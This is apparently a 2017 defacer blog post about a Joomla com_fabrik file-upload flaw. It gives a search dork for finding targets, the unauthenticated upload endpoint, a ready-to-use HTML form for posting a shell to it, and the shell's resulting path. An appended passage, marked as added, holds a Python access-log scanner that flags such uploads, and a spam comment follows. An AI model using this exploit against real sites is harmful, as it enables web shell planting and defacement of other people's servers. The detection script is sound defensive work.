Wednesday, December 13, 2017

Deface Joomla Com_fabrik Upload Shell CSRF


Fazlast: This time I will share the Joomla com_fabrik upload-shell deface exploit with CSRF.
For the tutorial, please see below.
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] $ Exploit Title : Joomla Com_fabrik Upload Shell
[+]
[+] $ Dork : inurl:index.php?option=com_fabrik
[+]
[+] $ Author: KING Zer0
[+]
[+] $ Tested : win - Linux
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
-----------------------------------------------------------|
|[+] Exploit :
|[+]
|[+]  /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
|[+]
|[+]  Vuln = {"filepath":null,"uri":null}
|[+]
|[+] Csrf = <form method="POST" action="http://target.com/index.php?
|[+]          option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
|[+]          enctype="multipart/form-data">
|[+]    <input type="file" name="file" /><button>Upload</button>
|[+]     </form>
|[+]
|[+]
|[+]
|[+]
|[+]
|[+] $ Your Access Shell: /patch/file.php
|[+]
-----------------------------------------------------------|
# Thanks to : Mr.Aljabar - RootNatsuhaa - 66H057in53CUR17Y - Xai Syndicate - PhantomGhost - All Defacer Indonesia
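
On the defensive side, the upload request described above stands out in web server access logs. The following is an added example, not part of the original post: it scans combined-format log lines for POSTs to the Fabrik fileupload ajax_upload endpoint and marks those whose Referer is missing or off-site, as a form hosted elsewhere would produce. The log lines, the host site.example and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters that identify the upload endpoint named on this page (lowercased).
FABRIK_UPLOAD = {"option": "com_fabrik", "task": "plugin.pluginajax",
                 "plugin": "fileupload", "method": "ajax_upload"}

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def is_fabrik_upload(target):
    """True if the request target addresses the fileupload ajax_upload handler."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # parse_qs percent-decodes; match case-insensitively, in any parameter order.
    return all(
        any(v.lower() == want for v in query.get(key, []))
        for key, want in FABRIK_UPLOAD.items()
    )

def find_upload_requests(lines, site_host):
    """Return one finding per POST to the endpoint, with a Referer check."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["verb"] != "POST" or not is_fabrik_upload(m["target"]):
            continue
        ref_host = urlsplit(m["referer"]).hostname if m["referer"] != "-" else None
        findings.append({
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            # A missing Referer counts as off-site: the site's own form sends one.
            "offsite_referer": ref_host != site_host,
        })
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Dec/2017:10:01:02 +0000] "POST /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload HTTP/1.1" 200 41 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Dec/2017:10:05:40 +0000] "POST /index.php?method=ajax_upload&plugin=fileupload&task=plugin.pluginAjax&option=com%5Ffabrik HTTP/1.1" 200 41 "http://other.example/form.html" "Mozilla/5.0"',
    '192.0.2.15 - - [13/Dec/2017:10:07:11 +0000] "GET /index.php?option=com_fabrik&view=form&formid=3 HTTP/1.1" 200 5120 "http://site.example/" "Mozilla/5.0"',
    '192.0.2.15 - - [13/Dec/2017:10:08:00 +0000] "POST /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload HTTP/1.1" 200 41 "http://site.example/index.php?option=com_fabrik&view=form&formid=3" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_upload_requests(SAMPLE_LOG, "site.example"):
        print(finding)
```

The Referer check is a triage heuristic only; every POST to this endpoint on a site that does not intentionally expose Fabrik uploads deserves review of the files written around that time.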

1 comment so far

Great stuff, please also visit www.otamegakun.com if you like :)

